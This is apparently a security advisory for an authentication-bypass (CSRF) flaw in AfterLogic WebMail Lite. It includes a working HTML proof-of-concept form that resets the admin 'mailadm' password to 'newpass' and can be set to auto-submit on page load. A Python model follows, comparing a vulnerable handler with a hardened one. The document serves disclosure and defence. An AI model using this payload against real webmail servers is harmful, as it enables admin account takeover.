AfterLogic WebMail Lite Authentication Bypass

2015.03.28
Credit: Paulos Yibelo
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

AfterLogic WebMail Lite is a free web-based IMAP and SMTP email client with an Ajax interface. It is available for both the PHP and the ASP.NET platforms. The PHP version is free and open-source software under the GNU Affero General Public License (AGPL) version 3; the ASP.NET version is proprietary software distributed as freeware. It is widely deployed on mail servers.

The proof of concept below targets the admin panel, which is normally located at site.com/mail/adminpanel/index.php (the PoC form posts to /webmail/adminpanel/index.php?submit; adjust the path to the target's installation). It is an attacker-hosted HTML page whose form reproduces the admin panel's "security" (change admin password) form. Submitting it sends the password-change request for the admin user mailadm and sets the new password to newpass. The request carries no session-bound or anti-CSRF token, only the form fields themselves. Uncommenting the second line of the script makes the page submit the form automatically when it is loaded.

<h2>After Logic Mail - Change Admin Password Exploit</h2>
<form action="http://localhost/webmail/adminpanel/index.php?submit" method="POST" id="security_form">
  <input type="hidden" name="form_id" value="security">
  <input type="text" class="wm_input" name="txtUserName" id="txtUserName" value="mailadm" size="30" />
  <input type="password" class="wm_input" name="txtNewPassword" id="txtNewPassword" value="newpass" size="30" />
  <input type="password" class="wm_input" name="txtConfirmNewPassword" id="txtConfirmNewPassword" value="newpass" size="30" />
  <input type="submit" name="submit_btn" value="Save" id="automate">
</form>
<script>
// uncomment the second line for automation
//document.getElementById('automate').click();
</script>
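To make the weakness and its fix concrete, here is an added Python model of the admin panel's "security" form handler. It is not AfterLogic's code: the class and function names, the session store and SITE_ORIGIN are assumptions, and the request body is constructed from the fields the PoC form above submits. The first handler accepts the PoC's POST as soon as form_id is "security" and the two password fields agree, so the password changes with no session at all; the hardened handler additionally requires an admin session, the anti-CSRF token bound to that session, and a same-site Origin, so the same cross-site POST is refused even when the victim's browser attaches the admin's session cookie.

```python
"""Model of a password-change form handler with and without CSRF/session checks.
Added example, not AfterLogic code; all names below are assumptions."""
import hmac
import secrets
from urllib.parse import parse_qs, urlencode

# Constructed request body: the exact fields the advisory's PoC form submits.
POC_BODY = urlencode({
    "form_id": "security",
    "txtUserName": "mailadm",
    "txtNewPassword": "newpass",
    "txtConfirmNewPassword": "newpass",
    "submit_btn": "Save",
})

SITE_ORIGIN = "https://mail.example.test"  # assumed origin of the admin panel


class AdminState:
    """Admin credential plus a session store (assumed model, not AfterLogic's)."""

    def __init__(self):
        self.username = "mailadm"
        self.password = "oldpass"
        self.sessions = {}  # session id -> anti-CSRF token bound to that session

    def login(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = secrets.token_hex(32)
        return sid

    def csrf_token(self, sid):
        return self.sessions[sid]


def _fields(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def _apply_password_change(state, f):
    """The form logic itself: both password fields must match and be non-empty."""
    new = f.get("txtNewPassword", "")
    if not new or new != f.get("txtConfirmNewPassword"):
        return 400, "passwords do not match"
    state.username = f.get("txtUserName") or state.username
    state.password = new
    return 200, "saved"


def handle_vulnerable(state, body, session_id=None, origin=None):
    """Mirrors the weakness the advisory exploits: any POST whose form_id is
    'security' is honoured. Session and Origin are ignored entirely."""
    f = _fields(body)
    if f.get("form_id") != "security":
        return 400, "unknown form"
    return _apply_password_change(state, f)


def handle_hardened(state, body, session_id=None, origin=None):
    """Same form, three checks added before anything is written."""
    f = _fields(body)
    if f.get("form_id") != "security":
        return 400, "unknown form"
    # 1. an authenticated admin session must exist
    if session_id not in state.sessions:
        return 401, "no admin session"
    # 2. the POST must carry the token bound to that session (constant-time compare);
    #    an attacker's page cannot read it, so a cross-site form cannot supply it
    supplied = f.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, state.sessions[session_id].encode()):
        return 403, "missing or wrong csrf token"
    # 3. defence in depth: browsers send Origin on cross-site POSTs; refuse foreign ones
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request refused"
    return _apply_password_change(state, f)


def demo():
    """Replay the PoC body against both handlers; returns (status, resulting password)."""
    results = {}

    v = AdminState()
    results["vulnerable_no_session"] = (handle_vulnerable(v, POC_BODY)[0], v.password)

    h = AdminState()
    results["hardened_no_session"] = (handle_hardened(h, POC_BODY)[0], h.password)

    # victim admin is logged in; attacker's page posts the PoC form cross-site,
    # so the browser attaches the session cookie but no token
    sid = h.login()
    status = handle_hardened(h, POC_BODY, sid, "https://attacker.example")[0]
    results["hardened_csrf"] = (status, h.password)

    # legitimate change from the real admin panel, token included
    legit = POC_BODY + "&" + urlencode({"csrf_token": h.csrf_token(sid)})
    results["hardened_legit"] = (handle_hardened(h, legit, sid, SITE_ORIGIN)[0], h.password)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

Running the block shows the PoC body succeeding (200, password now "newpass") against the unprotected handler with no session, and failing against the hardened one both without a session (401) and as a cross-site POST from a logged-in admin's browser (403); only the in-panel request that carries the session-bound token is applied. Checking the token before the Origin header matters: older browsers omit Origin on some form posts, so the token, not the header, is the primary control.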


Copyright 2024, cxsecurity.com